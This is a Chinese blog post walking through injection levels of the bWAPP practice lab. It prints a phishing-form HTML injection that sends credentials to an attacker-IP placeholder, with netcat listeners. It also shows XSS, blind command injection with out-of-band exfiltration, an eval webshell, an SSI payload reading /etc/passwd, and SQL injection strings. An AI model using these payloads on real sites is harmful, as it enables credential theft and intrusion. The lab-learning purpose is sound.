<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.3.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"yaoa.cool","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"always","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":false,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="HTML Injection - Reflected (GET) 输入的内容会直接回显到页面上，可以修改页面的dom或者执行js命令    或者可以直接构造一个表单，诱骗用户登录 1234http:&#x2F;&#x2F;192.168.0.176&#x2F;bWAPP&#x2F;htmli_get.php?firstname&#x3D;&lt;div style&#x3D;&quot;posit">
<meta property="og:type" content="article">
<meta property="og:title" content="bWapp通关记录(A1)">
<meta property="og:url" content="http://yaoa.cool/2021/02/06/bWapp%E9%80%9A%E5%85%B3%E8%AE%B0%E5%BD%95-A1/index.html">
<meta property="og:site_name" content="Ya0a">
<meta property="og:description" content="HTML Injection - Reflected (GET) 输入的内容会直接回显到页面上，可以修改页面的dom或者执行js命令    或者可以直接构造一个表单，诱骗用户登录 1234http:&#x2F;&#x2F;192.168.0.176&#x2F;bWAPP&#x2F;htmli_get.php?firstname&#x3D;&lt;div style&#x3D;&quot;posit">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://yaoa.cool/2021/02/06/images/bWapp%E9%80%9A%E5%85%B3%E8%AE%B0%E5%BD%95-A1/image-20210206111042464.png">
<meta property="og:image" content="http://yaoa.cool/2021/02/06/images/bWapp%E9%80%9A%E5%85%B3%E8%AE%B0%E5%BD%95-A1/image-20210206111354308.png">
<meta property="og:image" content="http://yaoa.cool/2021/02/06/images/bWapp%E9%80%9A%E5%85%B3%E8%AE%B0%E5%BD%95-A1/image-20210206111404019.png">
<meta property="og:image" content="http://yaoa.cool/2021/02/06/images/bWapp%E9%80%9A%E5%85%B3%E8%AE%B0%E5%BD%95-A1/image-20210206111413428.png">
<meta property="og:image" content="http://yaoa.cool/2021/02/06/images/bWapp%E9%80%9A%E5%85%B3%E8%AE%B0%E5%BD%95-A1/image-20210206113602287.png">
<meta property="og:image" content="http://yaoa.cool/2021/02/06/images/bWapp%E9%80%9A%E5%85%B3%E8%AE%B0%E5%BD%95-A1/image-20210206114344689.png">
<meta property="og:image" content="http://yaoa.cool/2021/02/06/images/bWapp%E9%80%9A%E5%85%B3%E8%AE%B0%E5%BD%95-A1/image-20210206111536461.png">
<meta property="og:image" content="http://yaoa.cool/2021/02/06/images/bWapp%E9%80%9A%E5%85%B3%E8%AE%B0%E5%BD%95-A1/image-20210206111654872.png">
<meta property="og:image" content="http://yaoa.cool/2021/02/06/images/bWapp%E9%80%9A%E5%85%B3%E8%AE%B0%E5%BD%95-A1/image-20210206111954403.png">
<meta property="og:image" content="http://yaoa.cool/2021/02/06/images/bWapp%E9%80%9A%E5%85%B3%E8%AE%B0%E5%BD%95-A1/image-20210206112056561.png">
<meta property="og:image" content="http://yaoa.cool/2021/02/06/images/bWapp%E9%80%9A%E5%85%B3%E8%AE%B0%E5%BD%95-A1/image-20210206112139324.png">
<meta property="og:image" content="http://yaoa.cool/2021/02/06/images/bWapp%E9%80%9A%E5%85%B3%E8%AE%B0%E5%BD%95-A1/image-20210206112204939.png">
<meta property="og:image" content="http://yaoa.cool/2021/02/06/images/bWapp%E9%80%9A%E5%85%B3%E8%AE%B0%E5%BD%95-A1/image-20210206112525981.png">
<meta property="og:image" content="http://yaoa.cool/2021/02/06/images/bWapp%E9%80%9A%E5%85%B3%E8%AE%B0%E5%BD%95-A1/image-20210206112748206.png">
<meta property="og:image" content="http://yaoa.cool/2021/02/06/images/bWapp%E9%80%9A%E5%85%B3%E8%AE%B0%E5%BD%95-A1/image-20210206113035504.png">
<meta property="og:image" content="http://yaoa.cool/2021/02/06/images/bWapp%E9%80%9A%E5%85%B3%E8%AE%B0%E5%BD%95-A1/image-20210206114732333.png">
<meta property="og:image" content="http://yaoa.cool/2021/02/06/images/bWapp%E9%80%9A%E5%85%B3%E8%AE%B0%E5%BD%95-A1/image-20210206115314527.png">
<meta property="og:image" content="http://yaoa.cool/2021/02/06/images/bWapp%E9%80%9A%E5%85%B3%E8%AE%B0%E5%BD%95-A1/image-20210206144340494.png">
<meta property="og:image" content="http://yaoa.cool/2021/02/06/images/bWapp%E9%80%9A%E5%85%B3%E8%AE%B0%E5%BD%95-A1/image-20210206144416515.png">
<meta property="og:image" content="http://yaoa.cool/2021/02/06/images/bWapp%E9%80%9A%E5%85%B3%E8%AE%B0%E5%BD%95-A1/image-20210206144748450.png">
<meta property="og:image" content="http://yaoa.cool/2021/02/06/images/bWapp%E9%80%9A%E5%85%B3%E8%AE%B0%E5%BD%95-A1/image-20210206145014195.png">
<meta property="og:image" content="http://yaoa.cool/2021/02/06/images/bWapp%E9%80%9A%E5%85%B3%E8%AE%B0%E5%BD%95-A1/image-20210206145029902.png">
<meta property="og:image" content="http://yaoa.cool/2021/02/06/images/bWapp%E9%80%9A%E5%85%B3%E8%AE%B0%E5%BD%95-A1/image-20210206145909782.png">
<meta property="og:image" content="http://yaoa.cool/2021/02/06/images/bWapp%E9%80%9A%E5%85%B3%E8%AE%B0%E5%BD%95-A1/image-20210206150222141.png">
<meta property="og:image" content="http://yaoa.cool/2021/02/06/images/bWapp%E9%80%9A%E5%85%B3%E8%AE%B0%E5%BD%95-A1/image-20210206151555826.png">
<meta property="og:image" content="http://yaoa.cool/2021/02/06/images/bWapp%E9%80%9A%E5%85%B3%E8%AE%B0%E5%BD%95-A1/image-20210206153610349.png">
<meta property="og:image" content="http://yaoa.cool/2021/02/06/images/bWapp%E9%80%9A%E5%85%B3%E8%AE%B0%E5%BD%95-A1/image-20210206153800802.png">
<meta property="article:published_time" content="2021-02-06T03:03:59.000Z">
<meta property="article:modified_time" content="2021-02-06T07:44:50.661Z">
<meta property="article:author" content="Ya0a">
<meta property="article:tag" content="web">
<meta property="article:tag" content="靶场">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://yaoa.cool/2021/02/06/images/bWapp%E9%80%9A%E5%85%B3%E8%AE%B0%E5%BD%95-A1/image-20210206111042464.png">

<link rel="canonical" href="http://yaoa.cool/2021/02/06/bWapp%E9%80%9A%E5%85%B3%E8%AE%B0%E5%BD%95-A1/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>bWapp通关记录(A1) | Ya0a</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">Ya0a</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
      <p class="site-subtitle" itemprop="description">痛定思痛</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://yaoa.cool/2021/02/06/bWapp%E9%80%9A%E5%85%B3%E8%AE%B0%E5%BD%95-A1/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/uploads/avatar.jpg">
      <meta itemprop="name" content="Ya0a">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Ya0a">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          bWapp通关记录(A1)
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>
              

              <time title="创建时间：2021-02-06 11:03:59 / 修改时间：15:44:50" itemprop="dateCreated datePublished" datetime="2021-02-06T11:03:59+08:00">2021-02-06</time>
            </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/web/" itemprop="url" rel="index"><span itemprop="name">web</span></a>
                </span>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h1 id="HTML-Injection-Reflected-GET"><a href="#HTML-Injection-Reflected-GET" class="headerlink" title="HTML Injection - Reflected (GET)"></a>HTML Injection - Reflected (GET)</h1><p><img src="../images/bWapp%E9%80%9A%E5%85%B3%E8%AE%B0%E5%BD%95-A1/image-20210206111042464.png" alt="image-20210206111042464"></p>
<p>输入的内容会直接回显到页面上，可以修改页面的dom或者执行js命令</p>
<p><img src="../images/bWapp%E9%80%9A%E5%85%B3%E8%AE%B0%E5%BD%95-A1/image-20210206111354308.png" alt="image-20210206111354308"></p>
<p><img src="../images/bWapp%E9%80%9A%E5%85%B3%E8%AE%B0%E5%BD%95-A1/image-20210206111404019.png" alt="image-20210206111404019"></p>
<p><img src="../images/bWapp%E9%80%9A%E5%85%B3%E8%AE%B0%E5%BD%95-A1/image-20210206111413428.png" alt="image-20210206111413428"></p>
<p>或者可以直接构造一个表单，诱骗用户登录</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;192.168.0.176&#x2F;bWAPP&#x2F;htmli_get.php?firstname&#x3D;&lt;div style&#x3D;&quot;position: absolute; left: 0px; top: 0px; width: 1900px; height: 1300px; z-index: 1000; background-color:white; padding: 1em;&quot;&gt;Please login with valid credentials:&lt;br&gt;&lt;form name&#x3D;&quot;login&quot; action&#x3D;&quot;http:&#x2F;&#x2F;AttackerIP&#x2F;login.htm&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td&gt;Username:&lt;&#x2F;td&gt;&lt;td&gt;&lt;input type&#x3D;&quot;text&quot; name&#x3D;&quot;username&quot;&#x2F;&gt;&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;&lt;tr&gt;&lt;td&gt;Password:&lt;&#x2F;td&gt;&lt;td&gt;&lt;input type&#x3D;&quot;text&quot; name&#x3D;&quot;password&quot;&#x2F;&gt;&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;&lt;tr&gt;&lt;td colspan&#x3D;2 align&#x3D;center&gt;&lt;input type&#x3D;&quot;submit&quot; value&#x3D;&quot;Login&quot;&#x2F;&gt;&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;&lt;&#x2F;table&gt;&lt;&#x2F;form&gt;&lt;&#x2F;div&gt;&amp;lastname&#x3D;2&amp;form&#x3D;submit</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">&#x2F;&#x2F;AttackerIP改成自己的IP</span><br></pre></td></tr></table></figure>
<p><img src="../images/bWapp%E9%80%9A%E5%85%B3%E8%AE%B0%E5%BD%95-A1/image-20210206113602287.png" alt="image-20210206113602287"></p>
<p>在攻击机上监听</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nc -l</span><br></pre></td></tr></table></figure>
<p><img src="../images/bWapp%E9%80%9A%E5%85%B3%E8%AE%B0%E5%BD%95-A1/image-20210206114344689.png" alt="image-20210206114344689"></p>
<p>后面的内容就只会简单的验证一下可以利用，不会再构造表单。</p>
<h1 id="HTML-Injection-Reflected-POST"><a href="#HTML-Injection-Reflected-POST" class="headerlink" title="HTML Injection - Reflected (POST)"></a>HTML Injection - Reflected (POST)</h1><p>第二关跟第一关区别不大，只改了传参方式。</p>
<p><img src="../images/bWapp%E9%80%9A%E5%85%B3%E8%AE%B0%E5%BD%95-A1/image-20210206111536461.png" alt="image-20210206111536461"></p>
<p><img src="../images/bWapp%E9%80%9A%E5%85%B3%E8%AE%B0%E5%BD%95-A1/image-20210206111654872.png" alt="image-20210206111654872"></p>
<p>注入方式一样</p>
<h1 id="HTML-Injection-Reflected-URL"><a href="#HTML-Injection-Reflected-URL" class="headerlink" title="HTML Injection - Reflected (URL)"></a>HTML Injection - Reflected (URL)</h1><p>这一关中url会直接输出到页面中。注入点直接就是url，类似于GET。</p>
<p><img src="../images/bWapp%E9%80%9A%E5%85%B3%E8%AE%B0%E5%BD%95-A1/image-20210206111954403.png" alt="image-20210206111954403"></p>
<p>但是经过测试发现通过hackbar或者地址栏直接注入，特殊符号会被url编码。</p>
<p><img src="../images/bWapp%E9%80%9A%E5%85%B3%E8%AE%B0%E5%BD%95-A1/image-20210206112056561.png" alt="image-20210206112056561"></p>
<p>所以需要通过burp修改一下数据包</p>
<p><img src="../images/bWapp%E9%80%9A%E5%85%B3%E8%AE%B0%E5%BD%95-A1/image-20210206112139324.png" alt="image-20210206112139324"></p>
<p>将被编码的参数解码。</p>
<p><img src="../images/bWapp%E9%80%9A%E5%85%B3%E8%AE%B0%E5%BD%95-A1/image-20210206112204939.png" alt="image-20210206112204939"></p>
<p>成功注入</p>
<h1 id="HTML-Injection-Stored-Blog"><a href="#HTML-Injection-Stored-Blog" class="headerlink" title="HTML Injection - Stored (Blog)"></a>HTML Injection - Stored (Blog)</h1><p>这关是一个留言板</p>
<p><img src="../images/bWapp%E9%80%9A%E5%85%B3%E8%AE%B0%E5%BD%95-A1/image-20210206112525981.png" alt="image-20210206112525981"></p>
<p>同样内容会被直接输出到页面中，直接输入注入的代码就行了</p>
<p><img src="../images/bWapp%E9%80%9A%E5%85%B3%E8%AE%B0%E5%BD%95-A1/image-20210206112748206.png" alt="image-20210206112748206"></p>
<h1 id="iFrame-Injection"><a href="#iFrame-Injection" class="headerlink" title="iFrame Injection"></a>iFrame Injection</h1><p>这关要观察一下url中的参数</p>
<p><code>http://192.168.0.176/bWAPP/iframei.php?ParamUrl=robots.txt&amp;ParamWidth=250&amp;ParamHeight=250</code></p>
<p>和页面中源码的关系</p>
<p><img src="../images/bWapp%E9%80%9A%E5%85%B3%E8%AE%B0%E5%BD%95-A1/image-20210206113035504.png" alt="image-20210206113035504"></p>
<p>可以看到iframe标签中的参数是可以直接控制的。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;192.168.0.176&#x2F;bWAPP&#x2F;iframei.php?ParamUrl&#x3D;robots.txt&quot; onload&#x3D;&quot;alert(1)&amp;ParamWidth&#x3D;250&amp;ParamHeight&#x3D;250</span><br></pre></td></tr></table></figure>
<p>添加一个onload参数，造成xss</p>
<p><img src="../images/bWapp%E9%80%9A%E5%85%B3%E8%AE%B0%E5%BD%95-A1/image-20210206114732333.png" alt="image-20210206114732333"></p>
<h1 id="OS-Command-Injection"><a href="#OS-Command-Injection" class="headerlink" title="OS Command Injection"></a>OS Command Injection</h1><p>这关直接看一下源码</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">&quot;target&quot;</span>]))</span><br><span class="line">&#123;</span><br><span class="line"></span><br><span class="line">    <span class="variable">$target</span> = <span class="variable">$_POST</span>[<span class="string">&quot;target&quot;</span>];</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span>(<span class="variable">$target</span> == <span class="string">&quot;&quot;</span>)</span><br><span class="line">    &#123;</span><br><span class="line"></span><br><span class="line">        <span class="keyword">echo</span> <span class="string">&quot;&lt;font color=\&quot;red\&quot;&gt;Enter a domain name...&lt;/font&gt;&quot;</span>;</span><br><span class="line"></span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">else</span></span><br><span class="line">    &#123;</span><br><span class="line"></span><br><span class="line">        <span class="keyword">echo</span> <span class="string">&quot;&lt;p align=\&quot;left\&quot;&gt;&quot;</span> . shell_exec(<span class="string">&quot;nslookup  &quot;</span> . commandi(<span class="variable">$target</span>)) . <span class="string">&quot;&lt;/p&gt;&quot;</span>;</span><br><span class="line"></span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<p>调用了shell_exec函数，通过shell环境执行命令。造成了命令执行漏洞。</p>
<p><img src="../images/bWapp%E9%80%9A%E5%85%B3%E8%AE%B0%E5%BD%95-A1/image-20210206115314527.png" alt="image-20210206115314527"></p>
<p>可以看到，执行了注入的命令。</p>
<h1 id="OS-Command-Injection-Blind"><a href="#OS-Command-Injection-Blind" class="headerlink" title="OS Command Injection - Blind"></a>OS Command Injection - Blind</h1><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line">else</span><br><span class="line">&#123;</span><br><span class="line"></span><br><span class="line">    echo &quot;Did you captured our GOLDEN packet?&quot;;</span><br><span class="line"></span><br><span class="line">    if(PHP_OS &#x3D;&#x3D; &quot;Windows&quot; or PHP_OS &#x3D;&#x3D; &quot;WINNT&quot; or PHP_OS &#x3D;&#x3D; &quot;WIN32&quot;)</span><br><span class="line">    &#123;</span><br><span class="line"></span><br><span class="line">        &#x2F;&#x2F; Debugging</span><br><span class="line">        &#x2F;&#x2F; echo &quot;Windows!&quot;;</span><br><span class="line"></span><br><span class="line">        &#x2F;&#x2F; Increasing the PING count will slow down your web scanner!</span><br><span class="line">        shell_exec(&quot;ping -n 1 &quot; . commandi($target));</span><br><span class="line"></span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    else</span><br><span class="line">    &#123;</span><br><span class="line"></span><br><span class="line">        &#x2F;&#x2F; Debugging</span><br><span class="line">        &#x2F;&#x2F; echo &quot;Not Windows!&quot;;</span><br><span class="line"></span><br><span class="line">        &#x2F;&#x2F; Increasing the PING count will slow down your web scanner!</span><br><span class="line">        shell_exec(&quot;ping -c 1 &quot; . commandi($target));</span><br><span class="line"></span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure>
<p>这关可以从源码中看到，只会执行命令，但是不会回显。也就是我们不知道命令执行的结果。</p>
<p>所以要通过数据外带的方式查看执行的结果。</p>
<p><img src="../images/bWapp%E9%80%9A%E5%85%B3%E8%AE%B0%E5%BD%95-A1/image-20210206144340494.png" alt="image-20210206144340494"></p>
<p>在攻击机上监听</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nc -lp 80</span><br></pre></td></tr></table></figure>
<p><img src="../images/bWapp%E9%80%9A%E5%85%B3%E8%AE%B0%E5%BD%95-A1/image-20210206144416515.png" alt="image-20210206144416515"></p>
<h1 id="PHP-Code-Injection"><a href="#PHP-Code-Injection" class="headerlink" title="PHP Code Injection"></a>PHP Code Injection</h1><p>看一下源码</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;p&gt;&lt;i&gt;<span class="meta">&lt;?php</span> @<span class="keyword">eval</span> (<span class="string">&quot;echo &quot;</span> . <span class="variable">$_REQUEST</span>[<span class="string">&quot;message&quot;</span>] . <span class="string">&quot;;&quot;</span>);<span class="meta">?&gt;</span>&lt;/i&gt;&lt;/p&gt;</span><br></pre></td></tr></table></figure>
<p>直接就是一个一句话木马。</p>
<p><img src="../images/bWapp%E9%80%9A%E5%85%B3%E8%AE%B0%E5%BD%95-A1/image-20210206144748450.png" alt="image-20210206144748450"></p>
<p>或者用蚁剑连接</p>
<p><img src="../images/bWapp%E9%80%9A%E5%85%B3%E8%AE%B0%E5%BD%95-A1/image-20210206145014195.png" alt="image-20210206145014195"></p>
<p>注意要设置cookie</p>
<p><img src="../images/bWapp%E9%80%9A%E5%85%B3%E8%AE%B0%E5%BD%95-A1/image-20210206145029902.png" alt="image-20210206145029902"></p>
<h1 id="Server-Side-Includes-SSI-Injection"><a href="#Server-Side-Includes-SSI-Injection" class="headerlink" title="Server-Side Includes (SSI) Injection"></a>Server-Side Includes (SSI) Injection</h1><p>这一关用了SSI，即在html中通过注释，调用命令或指针。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$line &#x3D; &#39;&lt;p&gt;Hello &#39; . $firstname . &#39; &#39; . $lastname . &#39;,&lt;&#x2F;p&gt;&lt;p&gt;Your IP address is:&#39; . &#39;&lt;&#x2F;p&gt;&lt;h1&gt;&lt;!--#echo var&#x3D;&quot;REMOTE_ADDR&quot; --&gt;&lt;&#x2F;h1&gt;&#39;;</span><br></pre></td></tr></table></figure>
<p>所以传的两个参数都是注入点，命令：<code>&lt;!--#exec cmd=&quot;cat /etc/passwd&quot; --&gt;</code></p>
<p><img src="../images/bWapp%E9%80%9A%E5%85%B3%E8%AE%B0%E5%BD%95-A1/image-20210206145909782.png" alt="image-20210206145909782"></p>
<h1 id="SQL-Injection-GET-Search"><a href="#SQL-Injection-GET-Search" class="headerlink" title="SQL Injection (GET/Search)"></a>SQL Injection (GET/Search)</h1><p>简单的sql注入</p>
<p><code>title=1%&#39; or &#39;1&#39;=&#39;1&#39;-- &amp;action=search</code></p>
<h1 id="SQL-Injection-GET-Select"><a href="#SQL-Injection-GET-Select" class="headerlink" title="SQL Injection (GET/Select)"></a>SQL Injection (GET/Select)</h1><p>每一个选项对应一个movie的值</p>
<p><img src="../images/bWapp%E9%80%9A%E5%85%B3%E8%AE%B0%E5%BD%95-A1/image-20210206150222141.png" alt="image-20210206150222141"></p>
<p>同样的注入</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">movie&#x3D;2 or 1&#x3D;1&amp;action&#x3D;go</span><br></pre></td></tr></table></figure>
<h1 id="SQL-Injection-POST-Search"><a href="#SQL-Injection-POST-Search" class="headerlink" title="SQL Injection (POST/Search)"></a>SQL Injection (POST/Search)</h1><p>只是请求方式变了，不说了</p>
<h1 id="SQL-Injection-POST-Select"><a href="#SQL-Injection-POST-Select" class="headerlink" title="SQL Injection (POST/Select)"></a>SQL Injection (POST/Select)</h1><p>同上</p>
<h1 id="SQL-Injection-AJAX-JSON-jQuery"><a href="#SQL-Injection-AJAX-JSON-jQuery" class="headerlink" title="SQL Injection (AJAX/JSON/jQuery)"></a>SQL Injection (AJAX/JSON/jQuery)</h1><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">$(&quot;#title&quot;).keyup(function()&#123;</span><br><span class="line">            &#x2F;&#x2F; Searches for a movie title</span><br><span class="line">            var search &#x3D; &#123;title: $(&quot;#title&quot;).val()&#125;;</span><br><span class="line"></span><br><span class="line">            &#x2F;&#x2F; AJAX call</span><br><span class="line">            $.getJSON(&quot;sqli_10-2.php&quot;, search, function(data)&#123;</span><br><span class="line">                init_table();</span><br><span class="line">                &#x2F;&#x2F; Constructs the table from the JSON data</span><br><span class="line">                var total &#x3D; 0;</span><br><span class="line">                $.each(data, function(key, val)&#123;</span><br><span class="line">                    total++;</span><br><span class="line">                    $(&quot;#table_yellow tr:last&quot;).after(&quot;&lt;tr&gt;&lt;td&gt;&quot; + val.title + &quot;&lt;&#x2F;td&gt;&lt;td align&#x3D;&#39;center&#39;&gt;&quot; + val.release_year + &quot;&lt;&#x2F;td&gt;&lt;td&gt;&quot; + val.main_character + &quot;&lt;&#x2F;td&gt;&lt;td align&#x3D;&#39;center&#39;&gt;&quot; + val.genre + &quot;&lt;&#x2F;td&gt;&lt;td align&#x3D;&#39;center&#39;&gt;&lt;a href&#x3D;&#39;http:&#x2F;&#x2F;www.imdb.com&#x2F;title&#x2F;&quot; + val.imdb + &quot;&#39; target&#x3D;&#39;_blank&#39;&gt;Link&lt;&#x2F;a&gt;&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;&quot;);</span><br><span class="line">                &#125;);</span><br><span class="line">                &#x2F;&#x2F; Empty result</span><br><span class="line">                if (total &#x3D;&#x3D; 0)</span><br><span class="line">                &#123;</span><br><span class="line">                    $(&quot;#table_yellow tr:last&quot;).after(&quot;&lt;tr height&#x3D;&#39;30&#39;&gt;&lt;td colspan&#x3D;&#39;5&#39; width&#x3D;&#39;580&#39;&gt;No movies were found!&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;&quot;);</span><br><span class="line">                &#125;</span><br><span class="line">            &#125;)</span><br><span class="line"></span><br><span class="line">        &#125;);</span><br></pre></td></tr></table></figure>
<p>通过源码可以看到触发keyup事件的时候，会通过ajax，向<code>sqli_10-2.php</code>发出请求。</p>
<p>直接用burp抓包</p>
<p><img src="../images/bWapp%E9%80%9A%E5%85%B3%E8%AE%B0%E5%BD%95-A1/image-20210206151555826.png" alt="image-20210206151555826"></p>
<p>注意url需要编码。</p>
<h1 id="SQL-Injection-CAPTCHA"><a href="#SQL-Injection-CAPTCHA" class="headerlink" title="SQL Injection (CAPTCHA)"></a>SQL Injection (CAPTCHA)</h1><p>只多了一个验证码，别的一样</p>
<p><code>http://192.168.0.176/bWAPP/sqli_9.php?title=1%&#39;-- &amp;action=search</code></p>
